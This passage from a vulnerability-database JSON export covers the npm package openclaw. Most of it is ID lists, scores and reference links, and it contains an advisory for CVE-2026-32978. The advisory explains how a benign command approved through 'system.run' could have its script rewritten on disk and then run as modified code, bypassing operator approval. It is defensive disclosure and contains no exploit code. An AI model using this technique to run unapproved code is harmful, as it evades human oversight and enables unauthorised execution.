,{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"}
,{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"}
,{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35627","G
HSA-65h8-27jh-q8wv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-849r-t5j1-vue8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91386?format=json","vulnerability_id":"VCID-84fd-3yvx-rfgq","summary":"OpenClaw: Unrecognized script runners could bypass `system.run` approval integrity\n## Summary\nIn affected versions of `openclaw`, node-host `system.run` approvals did not bind a mutable file operand for some script runners, including forms such as `tsx` and `jiti`. An attacker could obtain approval for a benign script-runner command, rewrite the referenced script on disk, and have the modified code execute under the already approved run context.\n\n## Impact\nDeployments that rely on node-host `system.run` approvals for script integrity could execute rewritten local code after operator approval. This can lead to unintended local code execution as the OpenClaw runtime user.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe approval planner only tracked mutable script operands for a hardcoded set of interpreters and runtime forms. Commands such as `tsx ./run.ts` and `jiti ./run.ts` fell through without a bound file snapshot, so the final pre-execution revalidation step was skipped.\n\n## Fix\nOpenClaw now fails closed for approval-backed interpreter and runtime commands unless it can bind exactly one concrete local file operand, and it extends direct-file binding coverage for additional runtime forms. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32978","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17277","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17313","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17316","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32978"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53","reference_id":"","reference_type":"","scores":[{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scori
ng_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:30:21Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners","reference_id":"","reference_type":"","scores":[{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:30:21Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners"},{"reference_url":"https://github.com/advisories/GHSA-qc36-x95h-7j53","reference_id":"GHSA-qc36-x95h-7j53","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qc36-x95h-7j53"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnera
bility":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnera
bility":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnera
bility":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnera
bility":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnera
bility":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnera
bility":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32978","GHSA-qc36-x95h-7j53"